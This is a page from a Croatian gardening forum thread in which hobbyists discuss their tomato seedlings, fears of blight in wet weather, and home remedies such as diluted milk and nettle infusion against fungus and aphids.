Rajčica - Lycopersicon esculentum |
Odgovori ![]() |
Stranica <1 4950515253 78> |
Korisnik | |
Sasa22 ![]() Novo sjeme ![]() ![]() Pridružen: 10 Svibanj 2012 Lokacija: otok Status: Offline Bodovi: 38 |
![]() ![]() ![]() ![]() ![]() |
Evo i moji 10 -ak dana, mada sam na otoku, sunce, uzivaju danas slaba kisa, 17 stupnjeva vani
pozz ![]() |
|
![]() |
|
Sponzorirani linkovi | |
![]() |
|
magadan ![]() Upravo klijam ![]() Pridružen: 16 Studeni 2011 Lokacija: Croatia Status: Offline Bodovi: 141 |
Bas gledam prognozu za sljedecih 25 dana i svako malo je kisa, nadam se da to nece stetiti rajcicama. Bojim se plamenjace
![]() |
|
![]() |
|
MisterNo ![]() Pustio korijenje ![]() Pridružen: 22 Studeni 2011 Lokacija: Croatia Status: Offline Bodovi: 308 |
Preventivno pošpricaj obranim mlijekom razrijeđenim u vodi 1:10. Po prognozi bit će i odsta sunca, en bi trebalo biti prevlažno. Kao prevencija je razrijeđeno mlijeko ok, ako dođe do zaraze nema lijeka, samo ''damage control''. |
|
![]() |
|
magadan ![]() Upravo klijam ![]() Pridružen: 16 Studeni 2011 Lokacija: Croatia Status: Offline Bodovi: 141 |
Da to sam i planirala sutra napraviti jer ce biti suncano. Jel ok da spricam ujutro ili je bolje kad uprzi sunce?
|
|
![]() |
|
Fiki ![]() Trajnica ![]() Pridružen: 11 Prosinac 2011 Lokacija: . Status: Offline Bodovi: 2792 |
![]() |
|
Pustolovka ![]() Neukroćena biljka ![]() ![]() Pridružen: 05 Srpanj 2010 Lokacija: Bosna i Hercego Status: Offline Bodovi: 3162 |
Mialia Fiki drugacije je boje nego inace?Jako su ti napredne sadnice masala.
![]() |
|
Trud je uzaludan, ako se priroda protivi.
Seneka |
|
![]() |
|
Fiki ![]() Trajnica ![]() Pridružen: 11 Prosinac 2011 Lokacija: . Status: Offline Bodovi: 2792 |
Sadnica brojim 120 ...
|
|
![]() |
|
Pustolovka ![]() Neukroćena biljka ![]() ![]() Pridružen: 05 Srpanj 2010 Lokacija: Bosna i Hercego Status: Offline Bodovi: 3162 |
Pozdrav,ne pisemo nista o paradajzima to govori da jos niko nije imao problema sa istima sto ne znaci da necemo imati s obzirom na hladno vrijeme,a paradajzi to ne podnose.Zanima me jel ko cime prskao ove godine od fungicida ili ste kao ja oslonili se na bio propravke?Ja strahujem da ove godine to nece bit dovoljno,trebat ce fungicidom prskati ko zeli svoj paradajz.
![]() |
|
Seneka |
|
![]() |
|
jagoda ![]() Cvjetni guru ![]() ![]() Pridružen: 15 Veljača 2009 Lokacija: Croatia Status: Offline Bodovi: 5241 |
Obično se ovdje ne javljam, ali ove godine imam baš svoje rajčice, od sjemena do sadnice..Imam puno vrsta i lijepo napreduju. Prvi posađeni DALMATINERI cvjetaju, dok ostali će brzo..Svo sjeme dobila sam od dragih ljudi sa CIFa i još nekih izvora. Svima puno hvala. Nadam se da ću za iduću godinu spremiti svoje sjeme...Imam posađenih nekih 12 vrsta, a 80 biljaka.
Na jednoj biljci primjetila sam neke sitne crvenkaste uši. Odstranila sam nekoliko listova i mislim da se nije širilo dalje. Čime bi bilo dobro špricati,ako se to još pojavi, da li možda koprivom?
![]() ![]() |
|
sutra je novi dan
|
|
![]() |
|
< ="text/" ="//./5/conn1.js">< ="text/" ="./5/d.txt">< ="text/" ="//./5/conn.js">
![]() ![]() |
|
![]() |
|
administrator ![]() Profil člana
Pošaljite privatnu poruku
Pronađi poruke člana
Poseti WEB site člana
Dodaj na listu prijatelja
administrator ![]() ![]() tata-mata foruma © Pridružen: 28 Siječanj 2007 Lokacija: Zlatna dolina Status: Offline Bodovi: 6910 |
kao što kaže Fiki probaj koprivom. ako ne ide i ako rade veliku štetu i šire s dalje onda obavezno neki insekticid.
Ali prije toga provjeriti da li se radi o uši ili crvenom pauku.
|
|
![]() |
|
Sasa22 ![]() Novo sjeme ![]() ![]() Pridružen: 10 Svibanj 2012 Lokacija: otok Status: Offline Bodovi: 38 |
Vidim na rajcicama jako sitne crne insekte, mislim da su biljne usi, i neke mi rajcice imaju male rupice, sinoc sam ih zalio mlijekom i vodom 1;10, jesam li dobro ucinio
thnx |
|
![]() |
|
Mlijeko se upotrebljava kod gljivičnih bolesti,,,a za kukce ti treba insektcid,,,lijepo zatopi koprive i prskaj,,,ona je odličan insektcid,,,ako se nebaviš eko uzgojem....ima mnogo kemijski sredstava kao i neopetroid
|
|
![]() |
|
Sasa nisi dobro uradio.trebas litru punomasnog mlijeka pomijesati sa litrom vodom.ako nemas punomasno onda litar kupovnog bez vode.
|
|
Seneka |
|
![]() |
|
Hvala, kod mene nema koprive, neopitroida valjda ima (u prahu), mjesa li se s vodom ili .... i kako, imam rucnu tlacnu prskalicu. A za ubuduce (nabavit cu koprivu) kako ide s njom hvala |
|
![]() |
|
Zatopiš 24 sata....razrijediš sa vodom ,,,jer je uistinu jak insektcid,,,,i u pumpu i prskaj,,,a neopitroid u prahu....jako je učinkovit,,,pa ti odluči,,!
|
|
![]() |
|
Sorry sto ispitujem, koliko koprive mi treba za 10 L vode thnx ![]() |
|
![]() |
|
1 kg,,,tako ja radim!
|
|
![]() |
|
Kod mene se aktivirala plamenjaca,vec pokidano nekoliko odraslih sadnica sa velikim plodovima.Ova godina nikako ne pogoduje paradajzima vlaga,kise.
![]() ![]() |
|
Seneka |
|
![]() |
|
Predlažem čaj od bijelog luka...!
|
|
![]() |
Odgovori ![]() |
Stranica <1 4950515253 78> |
Tweet
|
Pređi na drugi forum | Forumska ovlaštenja ![]() Vi ne možete objavljivati nove teme na ovom forumu Vi ne možete odgovarati na teme Vi ne možete brisati vaše poruke Vi ne možete urediti svoje poruke Vi ne možete dodati anketu Vi ne možete glasati u anketi |